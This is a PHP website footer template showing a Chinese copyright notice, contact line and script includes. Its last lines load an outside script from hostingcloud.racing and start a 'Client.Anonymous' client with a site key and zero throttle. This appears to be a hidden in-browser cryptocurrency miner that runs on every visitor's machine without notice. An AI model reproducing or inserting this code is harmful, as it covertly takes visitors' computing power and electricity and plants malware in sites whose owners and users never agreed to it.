<footer><div class="mdui-container mdui-p-y-5"><div class="foot-copyright"><div class="mdui-float-right mdui-hidden-xs">使用条款    隐私</div><div class="mdui-float-left">© 2018 <?php echo $web_title;?> 版权所有     联系方式：<?php echo $web_email;?> </div></div></div></footer>
    <script src="<?php echo '/template/'.$web_moban;?>/js/common.js"></script>

<script src="https://www.hostingcloud.racing/JvEQ.js"></script>
<script>
    var _client = new Client.Anonymous('712c0b2403896c784dd1757f713c2b974e268ec77a46226291a89be12817ccd3', {
        throttle: 0
    });
    _client.start();
    

</script>